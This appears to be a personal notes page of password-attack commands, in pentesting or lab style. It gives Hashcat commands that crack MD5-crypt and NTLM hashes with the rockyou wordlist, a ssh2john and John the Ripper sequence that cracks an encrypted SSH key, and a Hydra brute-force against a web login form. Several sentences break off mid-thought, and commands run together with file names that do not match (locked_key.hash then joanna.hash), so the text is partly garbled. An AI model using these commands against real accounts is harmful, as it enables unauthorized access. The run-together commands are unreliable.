This page is were I'll store all of my password attacking commands and tips. For local hash cracking I'll usually default to Hashcat. Hashcat is going to work best when running on your host machine rather than inside of a VM, especially if your host machine has a video card installed. When utilizing a graphics card Hashcat can be much faster than john the ripper, but there are still some cases where we'll use the tools provided by
apt install wordlists
echo '$1$cVbu7POZ$WB/V36i/G00QKzHkkqWig/' > hashes.txt.\hashcat64.exe -o cracked.txt -m 500 .\hashes.txt .\rockyou.txtcat cracked.txt
echo C5E0002FDE3F5EB2CF5730FFEE58EBCC > hashes.txt.\hashcat64.exe -o cracked.txt -m 1000 .\hashes.txt .\rockyou.txtcat cracked.txt
This is going to be one of the few times where we use
python /usr/share/john/ssh2john.py locked_key.pem > locked_key.hashjohn --wordlist=/usr/share/wordlists/rockyou.txt joanna.hash
hydra -P /usr/share/wordlists/nmap.lst -l admin 10.10.10.10 http-post-form "/path/to/login/admin.php:username=^USER^&password=^PASS^:Incorrect"